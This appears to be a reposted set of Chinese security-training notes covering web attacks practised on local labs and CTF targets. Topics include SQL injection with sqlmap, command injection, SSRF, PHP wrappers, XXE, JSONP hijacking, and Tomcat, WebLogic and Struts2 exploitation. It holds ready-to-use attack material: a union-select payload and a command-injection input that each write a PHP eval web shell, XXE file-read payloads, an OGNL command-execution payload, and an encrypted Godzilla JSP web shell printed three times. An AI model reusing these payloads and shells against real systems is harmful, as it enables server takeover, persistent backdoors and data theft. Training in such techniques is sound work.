寬字節(jié)注入

gbk 中文
utf-8
mysql：數(shù)據(jù)庫使用gbk編碼方式
php：魔術(shù)轉(zhuǎn)義符
使用%df跟省下的字節(jié)去組成一個漢字實現(xiàn)閉合。
例題：

1. 單引號沒反應
   
2. 添加%df報錯
   
3. 添加%23報錯消失，驗證即可知，閉合成功。
   

插入注入

insert

insert into news values (0, '123', '456')

閉合方式 123’,‘456’)#

insert into news values (0, '123
', '456')#','')

1.閉合方式（確定sql語句格式、列數(shù)）
2.字段匹配
3.字段類型（int 日期 時間）

二次注入

update
先將惡意字符入庫，再代入(有兩種方式取值：1.session取值 2.數(shù)據(jù)庫select取值)查詢。

1. 注冊惡意用戶 admin’ --> php轉(zhuǎn)義成admin’ --> 數(shù)據(jù)庫存儲為 admin’

// session取值
$username = $_SESSION['username'];
// admin'
update users set password='$pass' where username='admin'#' and password='$curr_pass'

使用 admin'# 完成閉合，通過修改admin'#用戶密碼的方式，基于注入，實際修改的是admin用戶的密碼，通過'# 拼接and password='$curr_pass'跳過了原密碼的驗證。

例題：sqli/Less-24

1. 注冊用戶admin’#12138
   
2. 登錄用戶admin’#12138
   
3. 修改admin’#12138用戶的密碼，頁面顯示被操作用戶為admin’#12138，實際上通過sql注入實現(xiàn)了對admin賬戶密碼的修改。

update users set password='$pass' where username='admin
'#' and password='$curr_pass'

正常sql語句

update users set password='$pass' where username='admin' and password='$curr_pass'

PDO模式(動態(tài)靶機?。。。。。?！)

目前注入點，只支持查詢select。
使用pdo模式，支持增刪改查操作。

選取chujiban數(shù)據(jù)庫中 news 表的 id, title 和 content 字段，并放到 HTML 表格中：

<?php
header("Content-Type:text/html;charset=utf-8");
echo "<table style='border: solid 1px black;'>";
echo "<tr><th>Id</th><th>標題</th><th>內(nèi)容</th></tr>";
 
class TableRows extends RecursiveIteratorIterator {
    function __construct($it) { 
        parent::__construct($it, self::LEAVES_ONLY); 
    }
 
    function current() {
        return "<td style='width:150px;border:1px solid black;'>" . parent::current(). "</td>";
    }
 
    function beginChildren() { 
        echo "<tr>"; 
    } 
 
    function endChildren() { 
        echo "</tr>" . "\n";
    } 
} 
 
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "chujiban";
$id = $_GET['id'];
if(!empty($id)) {
    try {
        $conn = new PDO("mysql:host=$servername;dbname=$dbname", $username, $password);
        $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        $stmt = $conn->prepare("SELECT id, title, content FROM news where id = '$id'"); 
        $stmt->execute();
     
        // 設(shè)置結(jié)果集為關(guān)聯(lián)數(shù)組
        $result = $stmt->setFetchMode(PDO::FETCH_ASSOC); 
        foreach(new TableRows(new RecursiveArrayIterator($stmt->fetchAll())) as $k=>$v) { 
            echo $v;
        }
    }
    catch(PDOException $e) {
        echo "Error: " . $e->getMessage();
    }
}
 

$conn = null;
echo "</table>";
?>

1. 瀏覽器打開php頁面
   
   

2. 單引號閉合
   
   

3. 基于pdo模式進行注入
   原sql代碼SELECT id, title, content FROM news where id = '$id'，通過瀏覽器輸入http://127.0.0.1/pdo.php?id=2%27;update%20news%20set%20title=0x61626364%20where%20id=1%23,實現(xiàn)了對id=1的數(shù)據(jù)修改。
   注意：1.第一個sql語句后要加分號；2.實現(xiàn)這種操作基于擁有update權(quán)限。
   

4. 查詢id=1的數(shù)據(jù)驗證更改成功。
   
   通過瀏覽器輸入http://127.0.0.1/pdo.php?id=1%27;insert into news values(0, 'abc', 'def')%23可以實現(xiàn)數(shù)據(jù)插入。

sql注入讀取文件

條件：

1. 數(shù)據(jù)庫賬號具備file權(quán)限
2. 文件讀取權(quán)限
3. mysql配置文件mysql.ini設(shè)置參數(shù)secure-file-priv=""

load_file(filename)
SELECT LOAD_FILE('D:/phpstudy_pro/WWW/1.txt');

1.數(shù)據(jù)庫權(quán)限 增刪改查
2.文件權(quán)限 讀寫

GRANT FILE,SELECT ON chujiban.* TO 'chujiban1'@'%' INENTIFIED BY '123456';

sql注入導出文件

into outfile "c:/xxx.txt"
select 1 into outfile "c:/2.txt";

條件：

1. 數(shù)據(jù)庫賬號具備file權(quán)限
2. 文件讀取權(quán)限
3. mysql配置文件mysql.ini設(shè)置參數(shù)secure-file-priv=""

mysql.ini->參數(shù)secure-file-priv
1.null 不允許導入導出
2.“”允許導出到任意位置
3.特定位置

例題：
1.找到注入點
通過在根目錄上傳phpinfo.php，然后查看在phpinfo頁面搜索ROOT，可以查找到路徑

2.寫入一句話木馬 寫入考試地址/var/www/html/

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,"<?php eval($_POST['pass']);?>" into outfile "/var/www/html/1.php"%23

3.使用哥斯拉連接
4.找flag

linux命令

find / -name *flag*

10.12筆記

sqlmap

——基于python 基于http請求

kali下的sqlmap命令：

1. 注入

sqlmap -u "http:xxx\id=1"

2.查看數(shù)據(jù)庫

sqlmap -u "http:xxx\id=1" --dbs

3.查看表

sqlmap -u "http:xxx\id=1" -D 數(shù)據(jù)庫名 --tables

4.查看列

sqlmap -u "http:xxx\id=1" -D 數(shù)據(jù)庫名 -T 表名 --columns

5.查看詳細信息

sqlmap -u "http:xxx\id=1" -D 數(shù)據(jù)庫名 -T 表名 --columns --dump

sqlmap參數(shù)

-h 幫助文檔
-u 指定url

python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1

–proxy 使用代理查看sqlmap的每次payload請求

python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 --proxy=http://127.0.0.1:8080

–current-user 指定當前用戶

python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 --current-user

–current-db 指定當前數(shù)據(jù)庫

python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 --current-db

–dbs 查看所有數(shù)據(jù)庫

python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 --dbs

–users 查看所有用戶

python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 --users

–password 獲取密碼hash

python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 --password

-D 指定數(shù)據(jù)庫
–tables 查看指定數(shù)據(jù)庫下的所有表

查看security數(shù)據(jù)庫下的所有表
python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 -D security --tables

-T 指定表
–columns 查看指定數(shù)據(jù)庫指定表下的所有列

查看security數(shù)據(jù)庫下的users表的所有列
python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 -D security -T users --columns

-C 指定列
-C username,password 指定username，password列輸出
–dump 查看表信息，導出數(shù)據(jù)

查看security數(shù)據(jù)庫下的users表的username，password列輸出
python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 -D security -T users -C username,password --dump
查看security數(shù)據(jù)庫下的users表信息
python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 -D security -T users --dump

//從第一條開始，到第五條
–start 1 --stop 5

查看security數(shù)據(jù)庫下的users表信息前五條
python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 -D security -T users --dump --start 1 --stop 5

針對post請求的兩種方式：

1. -r 讀取文件（一般適用于post請求）
   例Less-11：
   1.burp抓包
   
   2.copy to file（跟sqlmap同路徑）
   
   
   3.sqlmap執(zhí)行

python sqlmap.py -r 1.txt 
python sqlmap.py -r 1.txt --dbs
python sqlmap.py -r 1.txt -D 數(shù)據(jù)庫名 -T 表名 --dump

2. –data 添加參數(shù)
   網(wǎng)頁提交→f12→網(wǎng)絡(luò)→找到請求→負載→查看源→復制參數(shù)→sqlmap啟動

python sqlmap.py -u "http://127.0.0.1/sqli/Less-11/" --data "uname=1&paawd=1&submit=Submit"

–cookie 指定cookie

python sqlmap.py -u "http://127.0.0.1/sqli/Less-11/" --data "uname=1&paawd=1&submit=Submit"

User-Agent注入
* 指定注入?yún)?shù)位置

后續(xù)跟 -r 使用文件注入步驟一樣，唯一區(qū)別為在sqlmap啟動的時候會有一個是否對標記注入點進行payload的確認，如下。

sqlmap注入帶來的User-Agent為sqlmapxxx問題
使用參數(shù)–random-agent 實現(xiàn)隨機User-Agent解決。

python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --random-agent

–flush-session 刷新緩存

-v 0-6 顯示等級
1 默認
2 debug信息
3 顯示payload信息
4 顯示請求頭
5 顯示返回頭
6 顯示完整返回包

–level 1-5 默認1
1 普通探測
2 探測cookie

3 探測user-agent

User-Agent注入：對burp取到的抓包內(nèi)容直接進行探測
python sqlmap.py -r 3.txt --level 3

4 探測refer
5

10.13筆記

在4種注入方式都支持的情況下，注入方式使用的優(yōu)先級順序為
–technique=U,E,B,T
–threads 10
–sql-shell sqlmap提供的模擬mysql的shell
使用pdo進行測試：

python sqlmap.py -u "http://127.0.0.1/pdo.php?id=1" --sql-shell

非pdo模式不支持堆語句查詢，以sqli/Less1測試：

–privileges 查看用戶權(quán)限

sqlmap 文件讀寫

兩大前提：
1 所有的權(quán)限（1，2，3）
2 知道根路徑
load_file()
into outfile “”

–os-shell 獲取一個系統(tǒng)shell

python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --os-shell

針對于找到注入點，但是無法在數(shù)據(jù)庫中查詢到flag的情況

1. 找到注入點 添加 --os-shell
   
   1.使用默認sqlmap自導的幾個路徑
   2.自寫路徑地址
   3.路徑字典-絕對路徑 c:/file.txt
   4.使用sqlmap自帶的路徑字典(linux路徑)
   

2. 輸入路/var/www/html

3. 上傳小馬

4. 上傳大馬
   

5. 哥斯拉連接
   

ps:另外一個文件用于執(zhí)行系統(tǒng)命令

–os-shell 本質(zhì)：
into outfile “”
into dumpfile “”

–file-read load_file() 前提：有讀取權(quán)限

python sqlmap.py -u "http://127.0.0.1:80/sqli/Less-1/?id=1" --file-read=D:/phpstudy_pro/WWW/1.txt

上傳：
–file-write=1.php 指定本地的php文件
–file-dest=c:/phpstudy_pro/www/1.php 指定遠程路徑地址

# 在注入點把F:/迅雷下載/網(wǎng)安/archive/滲透工具/SQL注入/sqlmap/sqlmapproject-sqlmap-62bba47/3.txt上傳到D:/phpstudy_pro/WWW/2.txt文件中
python sqlmap.py -u "http://127.0.0.1:80/sqli/Less-1/?id=1" --file-dest=D:/phpstudy_pro/WWW/2.txt --file-write=F:/迅雷下載/網(wǎng)安/archive/滲透工具/SQL注入/sqlmap/sqlmapproject-sqlmap-62bba47/3.txt

前后綴

–prefix 增加前綴

--prefix '\'

–suffix 增加后綴

常用tamper及適用場景

base64encode base64編碼
between between替換大于號
equaltolike 過濾=，=換成like
concat2concatws 過濾concat
nonrecursivereplacement 關(guān)鍵字雙寫
randomcase 關(guān)鍵字隨機大小寫
space2morecomment 隨機注釋符代替空格
space2randomblank 隨機空白符替換空格
unmagicquotes 寬字節(jié)
varnish 偽造http頭 X-originating-IP
xforwardedfor 偽造http頭 X-Forwarded-For

python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --tamper=between,equaltolike,concat2concatws,randomcase,space2morecomment,varnish,xforwardedfor --random-agent --threads 10

10.14筆記

命令執(zhí)行漏洞

場景：路由器/運維機 ping命令

// ping.php
<?php
$ip = $_POST['ip'];
// system exec shell_exec ``
if(!empty($ip)) {
    $cmd = "ping ".$ip;
    system($cmd);
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ping</title>
</head>
<body>
    <form action="" method="post">
        ip：<input type="text" name="ip"><br>
        <input type="submit" value="ping">
    </form>
    
</body>
</html>

linux命令連接符

1. 分號 ; 依次運行兩個命令，真真和假真都可。

# 真真
ping 127.0.0.1 ; whoami
# 假真
ping 777.0.0.1 ; whoami

# 其他可用命令，如
# 假真
cat 1.txt ; whoami 
# 真真
find /var/www/html/ -name 題目文件名.php ; whoami 

2. || 或運算，只有假真才可

# 假真
ping 777.0.0.1  || whoami

# 其他可用命令，如
# 假真
cat 12138.txt || whoami 
# 假真
find / -name 12138.php || whoami 

3. | ，真真和假真都可

# 真真
ping 127.0.0.1 | whoami
# 假真
ping 777.0.0.1 | whoami

# 其他可用命令，如 
# 真真
find /var/www/html/ -name 題目文件名.php | whoami 
# 假真
cat 12138.txt | whoami

4. && ，只有真真才可。

# 真真
ping 127.0.0.1 && whoami

# 其他可用命令，如 
# 真真
find /var/www/html/ -name 題目文件名.php && whoami 

5. & ，真真和假真都可。

# 真真
ping 127.0.0.1 & whoami
# 假真
ping 777.0.0.1 & whoami

# 其他可用命令，如 
# 真真
find /var/www/html/ -name 題目文件名.php & whoami 
# 假真
cat 12138.txt & whoami

windows命令連接符

1. && ， 真真可輸出。

C:\Users\dongy>ping 127.0.0.1 && whoami

正在 Ping 127.0.0.1 具有 32 字節(jié)的數(shù)據(jù):
來自 127.0.0.1 的回復: 字節(jié)=32 時間<1ms TTL=64
來自 127.0.0.1 的回復: 字節(jié)=32 時間<1ms TTL=64
來自 127.0.0.1 的回復: 字節(jié)=32 時間<1ms TTL=64
來自 127.0.0.1 的回復: 字節(jié)=32 時間<1ms TTL=64

127.0.0.1 的 Ping 統(tǒng)計信息:
    數(shù)據(jù)包: 已發(fā)送 = 4，已接收 = 4，丟失 = 0 (0% 丟失)，
往返行程的估計時間(以毫秒為單位):
    最短 = 0ms，最長 = 0ms，平均 = 0ms
dy-pc\dongy

C:\Users\dongy>ping 777.0.0.1 && whoami
Ping 請求找不到主機 777.0.0.1。請檢查該名稱，然后重試。

2. &，真真和假真都可輸出。

C:\Users\dongy>ping 127.0.0.1 & whoami

正在 Ping 127.0.0.1 具有 32 字節(jié)的數(shù)據(jù):
來自 127.0.0.1 的回復: 字節(jié)=32 時間<1ms TTL=64
來自 127.0.0.1 的回復: 字節(jié)=32 時間<1ms TTL=64
來自 127.0.0.1 的回復: 字節(jié)=32 時間<1ms TTL=64
來自 127.0.0.1 的回復: 字節(jié)=32 時間<1ms TTL=64

127.0.0.1 的 Ping 統(tǒng)計信息:
    數(shù)據(jù)包: 已發(fā)送 = 4，已接收 = 4，丟失 = 0 (0% 丟失)，
往返行程的估計時間(以毫秒為單位):
    最短 = 0ms，最長 = 0ms，平均 = 0ms
dy-pc\dongy

C:\Users\dongy>ping 777.0.0.1 & whoami
Ping 請求找不到主機 777.0.0.1。請檢查該名稱，然后重試。
dy-pc\dongy

3. || ，假真可輸出。

C:\Users\dongy>ping 127.0.0.1 || whoami

正在 Ping 127.0.0.1 具有 32 字節(jié)的數(shù)據(jù):
來自 127.0.0.1 的回復: 字節(jié)=32 時間<1ms TTL=64
來自 127.0.0.1 的回復: 字節(jié)=32 時間<1ms TTL=64
來自 127.0.0.1 的回復: 字節(jié)=32 時間<1ms TTL=64
來自 127.0.0.1 的回復: 字節(jié)=32 時間<1ms TTL=64

127.0.0.1 的 Ping 統(tǒng)計信息:
    數(shù)據(jù)包: 已發(fā)送 = 4，已接收 = 4，丟失 = 0 (0% 丟失)，
往返行程的估計時間(以毫秒為單位):
    最短 = 0ms，最長 = 0ms，平均 = 0ms

C:\Users\dongy>ping 777.0.0.1 || whoami
Ping 請求找不到主機 777.0.0.1。請檢查該名稱，然后重試。
dy-pc\dongy

4. |，真真和假真都可輸出。

C:\Users\dongy>ping 127.0.0.1 | whoami
dy-pc\dongy

C:\Users\dongy>
C:\Users\dongy>ping 777.0.0.1 | whoami
dy-pc\dongy

127.0.0.1 | echo '<?php @eval($_POST[12138]);?>' >> /var/www/html/12138.php

127.0.0.1 | find / -name *flag*
127.0.0.1 | whoami

代碼執(zhí)行漏洞

10.15筆記

SSRF(可能考察burp爆破)

xss 跨站腳本攻擊（竊取cookie） 反射型和存儲型

script
xxx.php?xxx=<script>alert(1111)</script>

document.cookie
xxx.php?cookie=document,cookie

csrf 跨站請求偽造

ssrf 攻擊(參數(shù)image=后面的)可以爆破，主機地址不可以爆破)

http://www.xxx.com/a.php?image=http://xxx.com/1.jpg
http://www.xxx.com/a.php?image=http://10.211.55.18/1.jpg

//ssrf.php
<?php
if(isset($_REQUEST['url'])) {
    
    $_link = $_REQUEST['url'];
    //$filename = './curled/'.time().'.txt';
    $curlobj = curl_init($_link);
    //$fp = fopen($filename, "W");
    //curl_setopt($curlobj, CURLOPT_FILE, $fp);
    curl_setopt($curlobj, CURLOPT_HEADER, 0);
    curl_setopt($curlobj, CURLOPT_FOLLOWLOCATION, TRUE);
    curl_exec($curlobj);
    curl_close($curlobj);
    //fclose($fp);
    //$fp = fopen($filename, "r");
    //$result = fread($fp, filesize($filename));
    //fclose($fp);
    //echo $curlobj;
}else {
    echo "start！";
}
?>

讀取文件

http://127.0.0.1/ssrf.php?url=file://C:\Windows\System32\drivers\etc\hosts
?url=file://C:\Windows\System32\drivers\etc\hosts

1. 探測內(nèi)網(wǎng)web資源信息 ?url=http://127.0.0.1/
2. 探測端口 dist://127.0.0.1:3306 使用burp進行爆破
3. 讀取本地文件file:///var/www/html/xxx.txt

10.16筆記

WSDL api接口(不考)

前后端分離→前端 + 后端：考試平臺→vue + golang(編譯型語言，不同于php解釋型語言)→編譯后為可執(zhí)行程序
token ≈ session，cookie

php偽協(xié)議

1 file:// — 訪問本地文件系統(tǒng)
2 http:// — 訪問 HTTP(s) 網(wǎng)址
3 ftp:// — 訪問 FTP(s) URLs
4 php:// — 訪問各個輸入/輸出流（I/O streams）
5 zip:// — 壓縮流
6 phar:// — PHP 歸檔
7 glob:// — 查找匹配的文件路徑模式
8 data:// — 數(shù)據(jù)（RFC 2397）
9 ssh2:// — Secure Shell 2
10 rar:// — RAR
11 ogg:// — 音頻流
12 expect:// — 處理交互式的流

1. file://

// i.php  文件包含
<?php
$file=$_GET['file'];
include $file;
?>

相對路徑

絕對路徑

退級查找文件

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../../1.txt

絕對路徑查找文件

2. php://filter

//將文件內(nèi)容轉(zhuǎn)換成base64編碼
php://filter/convert.base64-encode/resource=xxx.php
php://filter/read=convert.base64-encode/resource=xxx.php

3. php://input

// 用來執(zhí)行php代碼，通常以post方式
127.0.0.1/i.php?file=php://input

寫入一句話代碼

//phpinput.php
<?php
    $file=fopen("dy12138.php","w");
    fwrite($file, "<?php eval(\$_POST['pass'])?>");
    fclose($file);
?>

burp寫入一句話木馬

連接成功

4. zip:// phar:// — 壓縮流

http://127.0.0.1/i.php?file=zip://d:\phpstudy_pro\www\1.zip%23123.txt
http://127.0.0.1/i.php?file=phar://d:\phpstudy_pro/www\1.zip\123.txt

5. http:// ——遠程包含,先考慮目錄掃描或從本身找線索。

http://127.0.0.1/i.php?file=http://127.0.0.1/1.txt

10.17筆記

1016考試題整理
思路：文件包含，在不知道其他文件的情況下，先讀文件本體，也可考慮使用php://input通過寫入shell的方式獲取flag，但是需要php.ini中allow_url_include=On
無法讀取，考慮是否為base64編碼。

XXE 外部實體注入

參考
實驗一：有回顯讀本地敏感文件(Normal XXE)
這個實驗的攻擊場景模擬的是在服務能接收并解析 XML 格式的輸入并且有回顯的時候，我們就能輸入我們自定義的 XML 代碼，通過引用外部實體的方法，引用服務器上面的文件.

本地服務器上放上解析 XML 的 php 代碼：

示例代碼：xml.php

<?php

    libxml_disable_entity_loader (false);
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
    $creds = simplexml_import_dom($dom);
    echo $creds;

?>

burp對127.0.0.1/xml.php抓包，send to repeater → 改為POST 提交方式
添加參數(shù)
payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE creds [  
<!ENTITY t12138 SYSTEM "file:///d:/phpstudy_pro/www/1.txt"> ]> 
<creds>&t12138;</creds>



<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE creds [  
<!ENTITY t12138 SYSTEM "file:///d:/phpstudy_pro/www/1.txt"> ]> 
<creds>&t12138;</creds>

同理，php://filter 同樣適用

//將文件內(nèi)容轉(zhuǎn)換成base64編碼
php://filter/convert.base64-encode/resource=xxx.php
php://filter/read=convert.base64-encode/resource=xxx.php

JSONP 挾持(不好考察)

同源策略介紹：

• 同源策略：同域名 同端口號 同協(xié)議；
• 瀏覽器有一個“同源策略”的規(guī)則： 只有在同域名同端口號和同協(xié)議下才能進行數(shù)據(jù)的請求和傳輸；
• 不符合同源策略的，瀏覽器為了安全，會阻止請求；

解決跨域問題，有兩種辦法：

• 第一就是：cors，由后端設(shè)置：Access-Control-Allow-Origin：*
• 這也就是為什么有一些數(shù)據(jù)可以跨域訪問，因為它們后端設(shè)置了允許指定接口或者允許所有接口去訪問，這個設(shè)置可以在Response Headers里看到；
• CORS是一種允許當前域（domain）的資源（比如html/js/web service）被其他域（domain）的腳本請求訪問的機制；
• 第二就是：jsonp，由前后端協(xié)作去設(shè)置；
• jsonp的原理：動態(tài)創(chuàng)建script標簽，src屬性指向沒有跨域限制；指向一個接口，接口返回的格式一定是***（）函數(shù)表達式
  代碼：

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <button id="mybtn">jsonp</button>
 
    <script>
        //調(diào)用這個數(shù)據(jù)里面的函數(shù)，拿回來請求的數(shù)據(jù)
        function callbackFunction(obj) {
            console.log(obj)
        }
 
        mybtn.onclick = function () {
            var oscript = document.createElement("script")//動態(tài)創(chuàng)建script節(jié)點
            oscript.src = `https://www.runoob.com/try/ajax/jsonp.php?jsoncallback=callbackFunction`//請求數(shù)據(jù)的地址
            document.body.appendChild(oscript)//將節(jié)點插入到body里面
            oscript.onload = function(){
                //刪除當前script節(jié)點
                oscript.remove()
            }
        }
    </script>
</body>
</html>

產(chǎn)生漏洞：jsonp挾持
JSONP劫持，就是攻擊者attacker通過構(gòu)造設(shè)計一個網(wǎng)站evil（網(wǎng)站中包含其他網(wǎng)站的JSONP漏洞利用代碼,具體為回調(diào)函數(shù)和script標簽）請求用戶已注冊并登錄的網(wǎng)站victim（含有JSONP漏洞，該網(wǎng)站對來自網(wǎng)站evil的請求沒有進行安全檢查直接返回數(shù)據(jù))將數(shù)據(jù)通過alert彈窗等方式返回到網(wǎng)站victim并顯示用戶在網(wǎng)站victim的注冊信息。
總結(jié)：JSONP劫持就是利用scirpt標簽的src屬性實現(xiàn)跨域請求，獲取網(wǎng)站數(shù)據(jù)的過程。

中間件

1. apache
   php服務 → 列目錄 → 幫助了解web架構(gòu)
   列目錄：
   
   可以使用目錄掃描工具，通過DIR.txt→PHP.txt→phptop2500.txt→phptop10000.txt字典，掃描目錄。

2. nginx
   虛假原因：nginx < 0.8 出現(xiàn)了1.jpg可使用1.jpg/*.php執(zhí)行圖片文件的漏洞
   真實原因：php.cgi配置問題導致的畸形解析漏洞
   一般通過畸形解析漏洞結(jié)合上傳白名單考察。

先嘗試是否可以直接上傳php，不行的話使用圖片一句話木馬。
靶機地址：http://ctf.vivivi.vip:30011/

圖片加入一句話木馬

copy 1.jpg/b + phpinput.php test.jpg

上傳→執(zhí)行→查看文件。

10.18筆記

tomcat

應用于java → 具有管理頁面
本地tomcat默認口令：admin:admin

基于tomcat通過jsp文件的一句話木馬連接哥斯拉：

1. 使用哥斯拉生成一句話木馬 1.jsp(基于java)
   
2. 將1.jsp打包成1.war
3. 在127.0.0.1/manager/html頁面上傳
   
4. 部署成功
   
5. 驗證1.jsp是否部署成功。
   
6. 哥斯拉連接
   

Tomcat PUT方法任意寫文件漏洞
對tomcat抓包send to repeater，然后修改方法為PUT，添加jsp文件名，寫入文件內(nèi)容，這里可以使用哥斯拉創(chuàng)建的jsp格式的一句話木馬。

//pass111
<%! String xc="3c6e0b8a9c15224a"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}
%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}
%>

連接成功。

weblogic漏洞

1.上傳文件漏洞
仍然使用哥斯拉生成的上一個war包

上傳war包

一直下一步下一步，直到完成，然后驗證木馬已經(jīng)上傳。

哥斯拉連接成功。

2.弱口令
3.ssrf漏洞
自查

struts2

java + tomcat框架 文件名：login.action login.do
漏洞類型：

1. 代碼執(zhí)行
2. 命令執(zhí)行

s2-001 DEMO

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

工具使用：Struts2綜合利用.jar
1.輸入網(wǎng)址，點擊驗證。

2.命令執(zhí)行：只能查看，不能寫入

3.上傳到根目錄

上傳成功。

頁面訪問上傳的jsp文件

此處可傳入一句話木馬。

//pass111
<%! String xc="3c6e0b8a9c15224a"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}
%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}
%>

寫入成功。

4.上傳到指定目錄
注意修改路徑

上傳成功

工具使用：Struts2漏洞檢查工具2019版 V2.3
1.輸入網(wǎng)址，點擊驗證。

2.查看漏洞信息

3.命令執(zhí)行

4.文件上傳
直接點擊上傳為上傳到根目錄，也可以自定義目錄。

上傳成功


此處可以上傳一句話木馬(jsp)

//pass111
<%! String xc="3c6e0b8a9c15224a"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}
%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}
%>

文章來源地址http://www.zghlxwxcb.cn/news/detail-823866.html

vulhub

到了這里，關(guān)于網(wǎng)安培訓第二期——sql注入+中間件+工具的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！